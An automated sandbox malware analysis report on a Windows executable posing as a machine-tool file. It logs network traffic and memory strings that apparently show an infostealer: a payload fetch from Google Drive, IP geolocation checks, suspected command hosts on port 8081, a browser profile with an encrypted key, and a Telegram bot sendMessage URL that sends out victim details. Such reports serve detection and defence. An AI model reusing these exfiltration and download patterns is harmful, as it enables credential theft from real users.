            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C88B20h11_2_38C88828
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8F918h11_2_38C8F620
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C83506h11_2_38C83238
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8E130h11_2_38C8DE38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38C8B628h11_2_38C8B330
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38CA1B20h11_2_38CA1828
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38CA1190h11_2_38CA0E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 4x nop then jmp 38CA0339h11_2_38CA0040

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49710 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49712 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49708 -> 142.250.80.46:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49714 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49715 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49719 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49717 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49716 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49718 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49713 -> 172.67.177.134:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 08:56:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000710C1000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000000.858359986.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20a
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBZr
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5958598913.0000000007750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/X
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=downloadtz
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
